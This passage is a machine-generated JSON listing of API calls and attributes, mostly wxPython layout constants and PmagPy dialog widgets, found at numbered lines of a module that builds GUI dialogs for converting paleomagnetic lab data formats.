"line_number": 790, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 790, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 795, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 795, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 800, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 800, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 807, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 807, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 810, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 810, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 813, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 813, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 814, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 814, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 815, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 817, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 817, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 818, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 818, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 819, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 820, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 820, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 821, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 821, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 822, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 822, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 824, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 824, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 825, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 825, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 826, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 826, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 827, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 827, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 828, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 828, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 829, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 829, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 830, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 830, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 831, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 831, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 832, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 832, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 833, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 833, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", 
"line_number": 834, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 834, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 834, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 835, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 835, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 836, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 836, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 836, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 837, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 838, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 838, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 838, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 841, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 841, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 854, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 858, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 858, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 861, "usage_type": "call"}, {"api_name": "os.path", "line_number": 861, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 862, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.sio", "line_number": 944, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 944, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 945, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 945, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 947, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 947, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 950, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 950, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.sio", "line_number": 950, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 950, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 960, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 960, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 961, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 961, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 964, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 964, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 968, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 968, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 971, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 971, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 974, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 974, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 977, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 977, 
"usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 981, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 981, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 985, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 985, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 988, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 988, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 993, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 993, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 996, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 996, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 999, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 999, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1004, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1004, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1005, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1005, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1008, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1008, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1012, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1013, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1016, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1016, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1028, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1034, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1034, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1036, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1036, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1094, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", 
"line_number": 1094, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.cit", "line_number": 1098, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1098, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1100, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1100, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1102, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1102, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1105, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1105, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.cit", "line_number": 1105, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1105, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1115, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1115, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1116, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1116, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1119, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1119, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1122, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1122, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1123, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1123, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1126, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1126, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1129, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1129, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 1133, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1133, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 1138, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 1138, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 1138, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 1138, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 1140, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 1141, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 1144, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1144, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1148, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1148, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1151, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1151, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1155, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1155, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1162, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1162, 
"usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1166, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1166, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1169, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1169, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1175, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1175, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1176, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1176, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1181, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1181, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1184, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1185, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1188, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1188, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 1202, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1202, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 1208, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1212, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1212, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 1216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1216, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1218, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1218, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1219, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1221, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 1221, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1222, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1225, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1227, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1228, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1230, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1231, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1240, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1240, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.huji", "line_number": 1277, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1277, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1279, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1279, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1281, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1281, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1284, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1284, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.huji.__doc__", "line_number": 1284, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic.huji", "line_number": 1284, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1284, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1294, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1294, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1295, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1295, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 1299, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1299, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 1302, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1302, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1306, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1306, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1310, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1310, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_specimen_ocn", "line_number": 1313, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1313, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1317, "usage_type": "call"}, {"api_name": 
"dialogs.pmag_widgets", "line_number": 1317, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1321, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1321, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1324, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1324, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1327, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1327, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1330, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1330, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1333, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1333, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1335, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1335, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1336, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1336, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1337, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1337, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1339, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1339, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1340, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1340, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1341, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1341, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1343, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1343, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1344, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1344, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1345, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1346, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1349, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1349, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1364, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1371, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1371, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1373, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1376, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1376, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1430, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1430, "usage_type": 
"name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1431, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1431, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1433, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1433, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1437, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1437, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1440, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1440, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1444, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1444, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1444, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1444, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1457, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1457, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1458, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1458, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 1462, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1462, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 1465, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1465, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1469, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1469, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1473, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1473, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_specimen_ocn", "line_number": 1476, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1476, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1480, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1480, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1484, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1484, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1487, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1487, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1490, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1490, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1493, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1493, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1496, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1496, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1498, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1498, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1499, "usage_type": "attribute"}, {"api_name": 
"wx.TOP", "line_number": 1499, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1500, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1500, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1501, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1501, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1503, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1503, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1504, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1504, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1505, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1505, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1506, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1506, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1507, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1507, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1508, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1508, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1508, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1509, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1512, "usage_type": 